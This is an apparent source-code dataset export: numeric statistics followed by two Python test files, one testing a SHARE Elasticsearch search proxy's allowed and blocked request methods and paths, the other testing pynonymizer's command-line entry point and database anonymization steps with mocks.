-1.71150902527557, -1.71142438616402, -1.70896476317588, -1.70724457088539, -1.7017517285505, -1.69998651599094, -1.69071358483784, -1.68920231264234, -1.68886993315355, -1.67714395258884, -1.66454274603339, -1.66290029197517, -1.65387857628297, -1.65242706346631, -1.65007686752239, -1.64979257195518, -1.64740574748032, -1.64478507070937, -1.63691527242944, -1.63541426577976, -1.6327064573579, -1.63265623866541, -1.63148041397343, -1.62971495288362, -1.62503259960895, -1.62280426560118, -1.61989195197603, -1.61039430903756, -1.60001928103155, -1.59717098280561, -1.59474711580785, -1.59455861619267, -1.59226994066529, -1.58219629028104, -1.58050160213268, -1.57554015279906, -1.57507155306422, -1.5732595618904, -1.571786907985, -1.56617034525202, -1.5630080754445, -1.55512318728101, -1.55174935433394, -1.54963968438918, -1.53477639911934, -1.53247120433308, -1.53241289360217, -1.53206025842873, -1.53014869245035, -1.5255748391867, -1.52499561770544, -1.52149753136422, -1.51907576624032, -1.51788004125355, -1.50196896772363, -1.49754270499549, -1.49752942111276, -1.49314621137239, -1.48357161450625, -1.47396214308553, -1.47087249010024, -1.46898302979973, -1.46611547540387, -1.46500561776518, -1.45595699028627, -1.45490778922291, -1.44350058978854, -1.44089317066432, -1.43555137796401, -1.42790013474591, -1.42177423917028, -1.41703537765471, -1.41404386184681, -1.40567571616606, -1.3993016143028, -1.39744741025476, -1.39650055236661, -1.38821615675844, -1.37981917491177, -1.34453217829785, -1.33543223554228, -1.32748620572223, -1.32619807482176, -1.32256908092003, -1.32086656554565, -1.31093958956234, -1.30612644055616, -1.30218378750615, -1.292390189237, -1.28624821180639, -1.2837370442399, -1.26135848707404, -1.26076130475925, -1.25880691794561, -1.25144698413725, -1.25040616920522, -1.24795259106321, -1.24462610121405, -1.23520396459594, -1.23258565931548, -1.23214383189408, -1.20420769047093, -1.19115956516894, -1.18850141299861, -1.18784132944629, 
-1.18312197985725, -1.18141103239185, -1.17198667518472, -1.1574473884479, -1.15547302875988, -1.15436184512092, -1.1492782786143, -1.14512772755633, -1.13333472235356, -1.13144201628438, -1.12758436826972, -1.1275262270534, -1.11604170754024, -1.11196663676282, -1.10653838735955, -1.10355835173696, -1.09426621454289, -1.08902293323313, -1.08230964724019, -1.08189678878143, -1.06947177159841, -1.06246750400604, -1.0507235919501, -1.04238716875262, -1.04002845756691, -1.03776283558259, -1.03100089406809, -1.02715039124769, -1.02482140105725, -1.01632881790586, -1.01264478082765, -1.00648174964558, -1.00572341041694, -0.995472313986702, -0.99256485331236, -0.988580000017022, -0.957848063220885, -0.93283578520007, -0.924828866057543, -0.921065089580478, -0.90090746786517, -0.880837749577085, -0.85245992296553, -0.847329067619522, -0.827499774943424, -0.825478162495361, -0.823005326357598, -0.820833134567771, -0.770283884793913, -0.72387440044806, -0.711615267900462, -0.689885884022624, -0.689530886654175, -0.657472831578137, -0.642788428086676, -0.607595078923237, -0.591722161954329, -0.492097069045875, -0.489076513247852, -0.477558238091107, -0.428102620439042, -0.338629448431751, -0.326670211958466, -0.324378464023917, -0.298708415917137, -0.209655625601901, -0.129565619268835, 0.0459296900675103, 0.138587255889901, 0.167122788074793, 0.250164879103255, 0.38805696412105, 0.388117026693325, 0.388226676241142, 0.46114992999589, 0.477397967012959, 0.515148585239905, 0.554924814842295, 0.563932128443976, 0.631964260977664, 0.653223377815047, 0.667694845910074, 0.710098342595984, 0.713170713096676, 0.717989916797078, 0.738811457761873, 0.739235071658754, 0.741557291838533, 0.743043353195949, 0.764158303808917, 0.785388077706216, 0.801267672769671, 0.805025125412237, 0.814814353247987, 0.819279873236768, 0.828760315586074, 0.841718725297425, 0.870852520173949, 0.885189968127755, 0.89381721250527, 0.909470630874892, 0.910520758770315, 0.917015818930873, 0.927323175823553, 
0.938036977604359, 0.943106311822479, 0.946348078874905, 0.954635466126727, 0.960191098886339, 0.969856620706237, 0.983343741059723, 0.989355372568323, 0.992604751345429, 0.999630859191061, 1.00192707606825, 1.0091056926022, 1.00913072142497, 1.01400653547193, 1.0451369882041, 1.04720960248872, 1.04848874296014, 1.05206912241713, 1.06840533126208, 1.07177222565555, 1.07765601331905, 1.10044306508489, 1.14521855910075, 1.14721025372615, 1.15117176566609, 1.15368418944538, 1.17365742844115, 1.18232596918433, 1.20252852661979, 1.20690250131736, 1.21028709095634, 1.21334406479577, 1.21732093182956, 1.21801680712667, 1.22436923497591, 1.23329981994489, 1.25977675993613, 1.27576186496016, 1.28173932980657, 1.29279270197421, 1.29807749565535, 1.31514427140457, 1.32277216941972, 1.32309098256522, 1.33327008571054, 1.33832806064235, 1.34075883200151, 1.35250997801875, 1.3539830942859, 1.35850407702677, 1.36778649133896, 1.36862462149624, 1.37363355429464, 1.37484067333569, 1.38754529273882, 1.38872814665393, 1.39558125510676, 1.40814588149176, 1.44557822484993, 1.47530752297389, 1.48156311994824, 1.48401985822081, 1.49274700696083, 1.50033361885617, 1.50091286445433, 1.50346960183587, 1.50558135644419, 1.5274697562299, 1.53155647907915, 1.53603694612939, 1.54847718136891, 1.56878532698145, 1.57310643991257, 1.62162603796759, 1.62724662946682, 1.6311703892394, 1.63278022906532, 1.63286277246058, 1.6390052219977, 1.64216618713934, 1.64774594814051, 1.65108720634525, 1.65419548542931, 1.65507482456591, 1.65686713620059, 1.66119216987342, 1.66324387968644, 1.69538281930072, 1.69943010687876, 1.71835249991339, 1.72218624392784, 1.72665629108124, 1.7305415588152, 1.74247528855006, 1.75904901577023, 1.76789095742535, 1.77612709066103, 1.78511430654618, 1.79136198982229, 1.82142296458901, 1.82427659994177, 1.83141481960834, 1.83407792478098, 1.83507741652202, 1.84156822274656, 1.84604908108617, 1.85206282259832, 1.85501897137491, 1.85514726519441, 1.8725780583658, 1.8733110072085, 
1.87702099485335, 1.8819786568054, 1.88653634536034, 1.88852330644768, 1.8922043980357, 1.92516259478729, 1.94267291353469, 1.98582750997238, 1.99285206337604, 1.99651440482193, 2.01260608164314, 2.01988206381339, 2.02654826883426, 2.03618133832892, 2.03962302659235, 2.0693423850561, 2.06986023383023, 2.07015511787096, 2.07981650099165, 2.09031096027266, 2.09794235989014, 2.10257313307331, 2.10283684013321, 2.11076677079529, 2.11345884319228, 2.11997846567281, 2.13480219730788, 2.13849594322748, 2.14014159423894, 2.14179613678729, 2.14546007755766, 2.15640334005494, 2.16179414876137, 2.18403438846943, 2.19811639987397, 2.20619657334253, 2.21422460341567, 2.21452378213307, 2.21627902918735, 2.22041612115193, 2.22517013985275, 2.22755164471054, 2.23416748291575, 2.24069215171696, 2.24153000593021, 2.25022483167014, 2.27827647213403, 2.28982723339836, 2.29243374383072, 2.30501805850302, 2.32158720203675, 2.32176742483064, 2.32178739485438, 2.331543058417, 2.3484316133167, 2.36610293793904, 2.36776511631972, 2.37491717417071, 2.37590849297063, 2.38261363024158, 2.44474259928041, 2.45065300086489, 2.45153772275136, 2.47214468657032, 2.53382334332036, 2.54913699632984, 2.56931454383761, 2.57045306287182, 2.57214556418502, 2.58536599752475, 2.58601242708292, 2.59658440428213, 2.60519113174386, 2.63014087680095, 2.64564991719137, 2.67922294868574, 2.69094444201124, 2.69378604148733, 2.70156045632584, 2.71355896020348, 2.72846673795643, 2.73273068190486, 2.74053944561202, 2.75646951941922, 2.77919130707459, 2.83037773693719, 2.85396841128117, 2.87189699646583, 2.87445930157727, 2.90438045626719, 2.90648625657812, 2.91629826551014, 2.92062296024744, 2.93240975984361, 2.95461889311079, 2.99659804937327, 3.00644546362766, 3.0401219204868, 3.10479018806494, 3.13048800094528, 3.13187383863909, 3.20422879636909, 3.21606576156584, 3.24892400229704, 3.46836466129959, 3.5775741166786, 3.58707758359076, 3.64691463194454, 3.67382885933952, 3.68153339403736, 3.7023603699075, 
3.74797284255835, 3.76800916543556, 3.84570423193084, 4.01723852946342, 4.06951125405614, 4.11724952712395, 4.12817984248988, 4.20874721492816, 4.32576917599121, 4.63994743989415, 4.78808672479767, 4.8547560668931, 5.63873268099544]
| 6,914.111111
| 20,134
| 0.799331
| 6,652
| 62,227
| 7.476548
| 0.163259
| 0.001508
| 0.001609
| 0.00181
| 0.971187
| 0.971187
| 0.971187
| 0.971187
| 0.971187
| 0.971187
| 0
| 0.844277
| 0.053578
| 62,227
| 8
| 20,135
| 7,778.375
| 0.000204
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
7a0bd3cd97182d852d26f491ed0ca60f813019b2
| 7,064
|
py
|
Python
|
tests/api/test_elasticsearch.py
|
felliott/SHARE
|
8fd60ff4749349c9b867f6188650d71f4f0a1a56
|
[
"Apache-2.0"
] | null | null | null |
tests/api/test_elasticsearch.py
|
felliott/SHARE
|
8fd60ff4749349c9b867f6188650d71f4f0a1a56
|
[
"Apache-2.0"
] | null | null | null |
tests/api/test_elasticsearch.py
|
felliott/SHARE
|
8fd60ff4749349c9b867f6188650d71f4f0a1a56
|
[
"Apache-2.0"
] | null | null | null |
from furl import furl
from unittest import mock
import pytest
class TestElasticSearchProxy:
    """Tests for the /api/v2/search/ proxy in front of Elasticsearch.

    The proxy should forward only whitelisted, read-oriented endpoints
    (_search, _count, _suggest, _mappings, single-document lookups) and
    reject everything else with 403/405.  The ``requests`` calls are
    mocked so no real Elasticsearch is needed; a 500-returning stub also
    proves the upstream is never consulted for rejected paths.
    """

    def test_cannot_put(self, client):
        # PUT is rejected (405) on every path under the proxy.
        assert client.put('/api/v2/search/').status_code == 405
        assert client.put('/api/v2/search/thing').status_code == 405
        assert client.put('/api/v2/search/_count').status_code == 405
        assert client.put('/api/v2/search/_search').status_code == 405
        assert client.put('/api/v2/search/type/index').status_code == 405
        assert client.put('/api/v2/search/type/index/_thing').status_code == 405

    def test_cannot_delete(self, client):
        # DELETE is rejected (405) on every path under the proxy.
        assert client.delete('/api/v2/search/').status_code == 405
        assert client.delete('/api/v2/search/thing').status_code == 405
        assert client.delete('/api/v2/search/_count').status_code == 405
        assert client.delete('/api/v2/search/_search').status_code == 405
        assert client.delete('/api/v2/search/type/index').status_code == 405
        assert client.delete('/api/v2/search/type/index/_thing').status_code == 405

    def test_cannot_access_bulk(self, client):
        # The Elasticsearch _bulk write API must never be reachable.
        assert client.delete('/api/v2/search/_bulk').status_code == 405
        assert client.delete('/api/v2/search/_bulk?test').status_code == 405
        assert client.delete('/api/v2/search/type/_bulk?foo').status_code == 405
        assert client.delete('/api/v2/search/type/index/_bulk').status_code == 405

    def test_scroll_forbidden(self, client):
        # Scroll contexts pin cluster resources, so both the dedicated
        # scroll endpoint and the ?scroll= query parameter are forbidden.
        assert client.post('/api/v2/search/_search/scroll').status_code == 403
        assert client.post('/api/v2/search/_search/?scroll=1m').status_code == 403
        assert client.get('/api/v2/search/_search/scroll').status_code == 403
        assert client.get('/api/v2/search/_search/?scroll=1m').status_code == 403

    @pytest.mark.parametrize('url', [
        '/api/v2/search/type',
        '/api/v2/search/type/',
        '/api/v2/search/type/id',
        '/api/v2/search/type/id/',
        '/api/v2/search/type/id/some/thing/else',
        '/api/v2/search/type/id/some/thing/else/',
        '/api/v2/search/type/id/_search',
        '/api/v2/search/type/id/_search/',
        '/api/v2/search/type/id/some/thing/else/_search',
        '/api/v2/search/type/id/some/thing/else/_search/',
        '/api/v2/search/type/id/some/thing/else/_count',
        '/api/v2/search/type/id/some/thing/else/_count/',
        '/api/v2/search/_coun',
        '/api/v2/search/__count',
        '/api/v2/search/_counttttttttttt',
        '/api/v2/search/_sear',
        '/api/v2/search/__search',
        '/api/v2/search/_searchh',
        '/api/v2/search/_sugges',
        '/api/v2/search/__suggest',
        '/api/v2/search/_ssuggest',
    ])
    def test_limitted_post(self, url, client):
        # POST to non-whitelisted (or near-miss misspelled) paths is
        # refused before proxying; the 500 stub would surface if the
        # request ever reached the mocked upstream.
        with mock.patch('api.search.views.requests.post') as post:
            post.return_value = mock.Mock(status_code=500, json=lambda: {})
            assert client.post(url, '{}', content_type='application/json').status_code in (403, 405)

    @pytest.mark.parametrize('url', [
        '/api/v2/search/type',
        '/api/v2/search/type/',
        '/api/v2/search/type/id/some/thing/else',
        '/api/v2/search/type/id/some/thing/else/',
        '/api/v2/search/type/id/_search',
        '/api/v2/search/type/id/_search/',
        '/api/v2/search/type/id/some/thing/else/_search',
        '/api/v2/search/type/id/some/thing/else/_search/',
        '/api/v2/search/type/id/some/thing/else/_count',
        '/api/v2/search/type/id/some/thing/else/_count/',
        '/api/v2/search/_coun',
        '/api/v2/search/__count',
        '/api/v2/search/_counttttttttttt',
        '/api/v2/search/_sear',
        '/api/v2/search/__search',
        '/api/v2/search/_searchh',
        '/api/v2/search/_mapping',
        '/api/v2/search/__mappings',
        '/api/v2/search/_mappingss',
    ])
    def test_limitted_get(self, url, client):
        with mock.patch('api.search.views.requests.get') as get:
            get.return_value = mock.Mock(status_code=500, json=lambda: {})
            # FIX: this test previously issued client.post(url), which
            # contradicted both its name and the requests.get patch above;
            # it now exercises GET as intended.
            assert client.get(url).status_code == 403

    def test_post_search(self, client):
        # POST to the whitelisted query endpoints is proxied through;
        # the mocked upstream's 200 is passed back to the caller.
        urls = (
            '/api/v2/search/_search',
            '/api/v2/search/_search/',
            '/api/v2/search/_suggest',
            '/api/v2/search/_suggest/',
            '/api/v2/search/type/_count',
            '/api/v2/search/type/_count/',
            '/api/v2/search/type/_search',
            '/api/v2/search/type/_search/',
            '/api/v2/search/type/_suggest',
            '/api/v2/search/type/_suggest/',
        )
        with mock.patch('api.search.views.requests.post') as post:
            post.return_value = mock.Mock(status_code=200, json=lambda: {})
            for url in urls:
                assert client.post(url, '{}', content_type='application/json').status_code == 200

    def test_cannot_post(self, client):
        # _mappings is read-only: POSTing to it yields 405.
        urls = (
            '/api/v2/search/_mappings/',
            '/api/v2/search/_mappings',
            '/api/v2/search/_mappings/creativeworks',
            '/api/v2/search/_mappings/creativeworks/',
        )
        with mock.patch('api.search.views.requests.post') as post:
            post.return_value = mock.Mock(status_code=500, json=lambda: {})
            for url in urls:
                assert client.post(url, '{}', content_type='application/json').status_code == 405

    @pytest.mark.parametrize('url', [
        '/api/v2/search/_search',
        '/api/v2/search/_search/',
        '/api/v2/search/type/_count',
        '/api/v2/search/type/_count/',
        '/api/v2/search/type/_search',
        '/api/v2/search/type/_search/',
        '/api/v2/search/_mappings/',
        '/api/v2/search/_mappings',
        '/api/v2/search/_mappings/creativeworks',
        '/api/v2/search/_mappings/creativeworks/',
        '/api/v2/search/creativeworks/some-id',
        '/api/v2/search/creativeworks/some-id/',
        '/api/v2/search/agent/some-id/',
        '/api/v2/search/agent/some_id/',
    ])
    def test_get_search(self, url, client):
        # GET on whitelisted query/mapping/document paths is proxied.
        with mock.patch('api.search.views.requests.get') as get:
            get.return_value = mock.Mock(status_code=200, json=lambda: {})
            assert client.get(url).status_code == 200

    def test_cannot_get(self, client):
        # _suggest is POST-only: GET yields 405.
        urls = (
            '/api/v2/search/_suggest',
            '/api/v2/search/_suggest/',
            '/api/v2/search/type/_suggest',
            '/api/v2/search/type/_suggest/',
        )
        with mock.patch('api.search.views.requests.get') as get:
            get.return_value = mock.Mock(status_code=500, json=lambda: {})
            for url in urls:
                assert client.get(url).status_code == 405

    def test_elastic_proxy(self, client, elastic):
        # The proxy must hit the configured ES URL/index verbatim.
        with mock.patch('api.search.views.requests.get') as get:
            get.return_value = mock.Mock(status_code=200, json=lambda: {})
            client.get('/api/v2/search/_search')
            elastic_url = furl('{}{}/{}'.format(elastic.es_url, elastic.es_index, '_search'))
            get.assert_called_with(elastic_url)
| 44.427673
| 100
| 0.605606
| 922
| 7,064
| 4.47397
| 0.081345
| 0.112727
| 0.248
| 0.145455
| 0.904
| 0.896727
| 0.858182
| 0.841939
| 0.803152
| 0.721212
| 0
| 0.035844
| 0.221971
| 7,064
| 158
| 101
| 44.708861
| 0.714702
| 0
| 0
| 0.586207
| 0
| 0
| 0.408975
| 0.362967
| 0
| 0
| 0
| 0
| 0.186207
| 1
| 0.075862
| false
| 0
| 0.02069
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1498976356a84e48973f123e26d5a648d86d28e
| 22,272
|
py
|
Python
|
tests/test_main.py
|
HenkWillcock/pynonymizer
|
8ae39449be46da3f6ed87eaced50485160fbf21d
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
HenkWillcock/pynonymizer
|
8ae39449be46da3f6ed87eaced50485160fbf21d
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
HenkWillcock/pynonymizer
|
8ae39449be46da3f6ed87eaced50485160fbf21d
|
[
"MIT"
] | null | null | null |
import pytest
import unittest
from unittest.mock import patch, Mock, mock_open
from pynonymizer.__main__ import main
from pynonymizer.pynonymize import ArgumentValidationError, DatabaseConnectionError, pynonymize
from types import SimpleNamespace
def test_pynonymize_missing_db_credentials():
    """pynonymize must refuse to run when db_user/db_password are absent."""
    call_kwargs = {
        "input_path": "input.sql",
        "strategyfile_path": "strategyfile.yml",
        "output_path": "output.sql",
        "db_user": None,
        "db_password": None,
    }
    with pytest.raises(ArgumentValidationError):
        pynonymize(**call_kwargs)
@patch("dotenv.find_dotenv")
@patch("dotenv.load_dotenv")
@patch("pynonymizer.__main__.create_parser")
@patch("pynonymizer.__main__.pynonymize", autospec=True)
class MainArgTests(unittest.TestCase):
def setUp(self):
self.parsed_args = SimpleNamespace(
legacy_input=None,
legacy_strategyfile=None,
legacy_output=None,
input="TEST_INPUT",
strategyfile="TEST_STRATEGYFILE",
output="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step="TEST_START_AT_STEP",
skip_steps=["TEST_SKIP_1", "TEST_SKIP_2"],
stop_at_step="TEST_STOP_AT_STEP",
seed_rows=None,
mssql_backup_compression=False,
mysql_dump_opts="--compatible=mysql4 --max_allowed_packet=1024M",
dry_run=True,
verbose=True
)
def test_dotenv_called(self, pynonymize, create_parser, load_dotenv, find_dotenv):
"""
dotenv should be called
"""
parser_mock = Mock(parse_args=Mock(return_value=self.parsed_args))
create_parser.return_value = parser_mock
main([])
find_dotenv.assert_called()
load_dotenv.assert_called()
def test_arg_pass_legacy_override(self, pynonymize, create_parser, load_dotenv, find_dotenv):
"""
the parsed set of args should be passed to the pynonymize main function
legacy args should override normal ones to account for old positional behaviour
"""
self.parsed_args.legacy_input = "LEGACY_INPUT"
self.parsed_args.legacy_strategyfile = "LEGACY_STRATEGYFILE"
self.parsed_args.legacy_output = "LEGACY_OUTPUT"
parser_mock = Mock(parse_args=Mock(return_value=self.parsed_args))
create_parser.return_value = parser_mock
main([])
create_parser.assert_called()
parser_mock.parse_args.assert_called()
call_kwargs = pynonymize.call_args[1]
assert call_kwargs["input_path"] == "LEGACY_INPUT"
assert call_kwargs["strategyfile_path"] == "LEGACY_STRATEGYFILE"
assert call_kwargs["output_path"] == "LEGACY_OUTPUT"
def test_arg_pass_normal(self, pynonymize, create_parser, load_dotenv, find_dotenv):
"""
the parsed set of args should be passed to the pynonymize main function
"""
parser_mock = Mock(parse_args=Mock(return_value=self.parsed_args))
create_parser.return_value = parser_mock
main([])
create_parser.assert_called()
parser_mock.parse_args.assert_called()
pynonymize.assert_called_once_with(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step="TEST_START_AT_STEP",
skip_steps=["TEST_SKIP_1", "TEST_SKIP_2"],
stop_at_step="TEST_STOP_AT_STEP",
seed_rows=None,
mssql_backup_compression=False,
mysql_dump_opts="--compatible=mysql4 --max_allowed_packet=1024M",
dry_run=True,
verbose=True
)
@patch("dotenv.find_dotenv", Mock())
@patch("dotenv.load_dotenv", Mock())
@patch("pynonymizer.__main__.create_parser", Mock())
@patch("pynonymizer.__main__.pynonymize", Mock(side_effect=ArgumentValidationError(["test validation"])))
def test_sysexit_on_argument_invalid():
"""
If pynonymize throws an argument validation error, main should exit with err 2
"""
with pytest.raises(SystemExit) as e_info:
main(["blah"])
assert e_info.value.code == 2
@patch("dotenv.find_dotenv", Mock())
@patch("dotenv.load_dotenv", Mock())
@patch("pynonymizer.__main__.create_parser", Mock())
@patch("pynonymizer.__main__.pynonymize", Mock(side_effect=DatabaseConnectionError()))
def test_sysexit_on_database_connection_error():
"""
If pynonymize throws an argument validation error, main should exit with err 1
"""
with pytest.raises(SystemExit) as e_info:
main(["blah"])
assert e_info.value.code == 1
@patch("dotenv.find_dotenv", Mock())
@patch("dotenv.load_dotenv", Mock())
@patch("pynonymizer.pynonymize.read_config")
@patch("pynonymizer.pynonymize.get_provider")
@patch("pynonymizer.pynonymize.FakeColumnGenerator")
@patch("pynonymizer.pynonymize.StrategyParser")
@patch("builtins.open", mock_open(read_data="TESTFILEDATA"))
class MainProcessTests(unittest.TestCase):
def test_any_db_kwarg(self, StrategyParser, FakeColumnSet, get_provider, read_config):
"""
test that dynamic args are passed to the provider properly e.g. mssql_blah
"""
pynonymize(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="mssql",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
mysql_other_amazing_var="TEST_DYNAMIC_VAR", # as this is mssql, this should be ignored
mssql_special_provider_var="TEST_DYNAMIC_VAR2"
)
StrategyParser.return_value.parse_config.assert_called()
get_provider.assert_called_with(type="mssql", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150, special_provider_var="TEST_DYNAMIC_VAR2")
def test_pynonymize_main_process(self, StrategyParser, FakeColumnSet, get_provider, read_config):
"""
a rough smoke test for the main process. This needs an integration test to back it up.
"""
pynonymize(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
seed_rows=999
)
StrategyParser.return_value.parse_config.assert_called()
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=999)
provider = get_provider.return_value
provider.create_database.assert_called()
provider.restore_database.assert_called()
provider.anonymize_database.assert_called()
provider.dump_database.assert_called()
provider.drop_database.assert_called()
def test_pynonymize_stop_at_step(self, StrategyParser, FakeColumnSet, get_provider, read_config):
pynonymize(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
stop_at_step="ANONYMIZE_DB"
)
StrategyParser.return_value.parse_config.assert_called()
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_called()
provider.restore_database.assert_called()
provider.anonymize_database.assert_called()
provider.dump_database.assert_not_called()
provider.drop_database.assert_not_called()
def test_pynonymize_skip_steps(self, StrategyParser, FakeColumnSet, get_provider,
read_config):
pynonymize(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
skip_steps=["ANONYMIZE_DB", "CREATE_DB", "DUMP_DB"]
)
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_not_called()
provider.restore_database.assert_called()
provider.anonymize_database.assert_not_called()
provider.dump_database.assert_not_called()
provider.drop_database.assert_called()
def test_pynonymize_start_at_step(self, StrategyParser, FakeColumnSet, get_provider,
read_config):
pynonymize(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step="ANONYMIZE_DB"
)
StrategyParser.return_value.parse_config.assert_called()
get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
provider = get_provider.return_value
provider.create_database.assert_not_called()
provider.restore_database.assert_not_called()
provider.anonymize_database.assert_called()
provider.dump_database.assert_called()
provider.drop_database.assert_called()
@patch("dotenv.find_dotenv", Mock())
@patch("dotenv.load_dotenv", Mock())
@patch("pynonymizer.pynonymize.read_config")
@patch("pynonymizer.pynonymize.get_provider")
@patch("pynonymizer.pynonymize.FakeColumnGenerator")
@patch("pynonymizer.pynonymize.StrategyParser")
@patch("builtins.open", mock_open(read_data="TESTFILEDATA"))
class OptionalArgumentsSkippedTests(unittest.TestCase):
"""
pynonymize should not throw argument validation errors for missing "mandatory" args
that are only mandatory for certain steps.
START = 0
GET_SOURCE = 100
CREATE_DB = 200
RESTORE_DB = 300
ANONYMIZE_DB = 400
DUMP_DB = 500
DROP_DB = 600
END = 9999
"""
def test_optional_input_when_skip_input_steps(self, StrategyParser, FakeColumnSet,
                                              get_provider, read_config):
    """With RESTORE_DB skipped, a missing input_path must not raise."""
    db_kwargs = dict(
        db_type="TEST_TYPE",
        db_host="TEST_HOST",
        db_port="TEST_PORT",
        db_name="TEST_NAME",
        db_user="TEST_USER",
        db_password="TEST_PASSWORD",
    )
    pynonymize(
        input_path=None,
        strategyfile_path="TEST_STRATEGYFILE",
        output_path="TEST_OUTPUT",
        fake_locale="TEST_LOCALE",
        start_at_step=None,
        stop_at_step=None,
        skip_steps=["RESTORE_DB"],
        **db_kwargs,
    )
    StrategyParser.return_value.parse_config.assert_called()
    get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
    provider = get_provider.return_value
    # Only the restore step is skipped; the rest of the pipeline runs.
    provider.create_database.assert_called()
    provider.restore_database.assert_not_called()
    provider.anonymize_database.assert_called()
    provider.dump_database.assert_called()
    provider.drop_database.assert_called()
def test_optional_input_when_start_at_after_input_steps(self, StrategyParser, FakeColumnSet,
                                                        get_provider, read_config):
    """Starting after the input steps makes input_path optional."""
    db_kwargs = dict(
        db_type="TEST_TYPE",
        db_host="TEST_HOST",
        db_port="TEST_PORT",
        db_name="TEST_NAME",
        db_user="TEST_USER",
        db_password="TEST_PASSWORD",
    )
    pynonymize(
        input_path=None,
        strategyfile_path="TEST_STRATEGYFILE",
        output_path="TEST_OUTPUT",
        fake_locale="TEST_LOCALE",
        start_at_step="ANONYMIZE_DB",
        stop_at_step=None,
        skip_steps=None,
        **db_kwargs,
    )
    StrategyParser.return_value.parse_config.assert_called()
    get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
    provider = get_provider.return_value
    # Create/restore precede the start step, so they never run.
    provider.create_database.assert_not_called()
    provider.restore_database.assert_not_called()
    provider.anonymize_database.assert_called()
    provider.dump_database.assert_called()
    provider.drop_database.assert_called()
def test_optional_input_when_stop_at_before_input_steps(self, StrategyParser, FakeColumnSet,
                                                        get_provider, read_config):
    """Stopping before the input steps makes input_path optional."""
    db_kwargs = dict(
        db_type="TEST_TYPE",
        db_host="TEST_HOST",
        db_port="TEST_PORT",
        db_name="TEST_NAME",
        db_user="TEST_USER",
        db_password="TEST_PASSWORD",
    )
    pynonymize(
        input_path=None,
        strategyfile_path="TEST_STRATEGYFILE",
        output_path="TEST_OUTPUT",
        fake_locale="TEST_LOCALE",
        start_at_step=None,
        stop_at_step="CREATE_DB",
        skip_steps=None,
        **db_kwargs,
    )
    get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
    provider = get_provider.return_value
    # Only create runs; everything after the stop step is suppressed.
    provider.create_database.assert_called()
    provider.restore_database.assert_not_called()
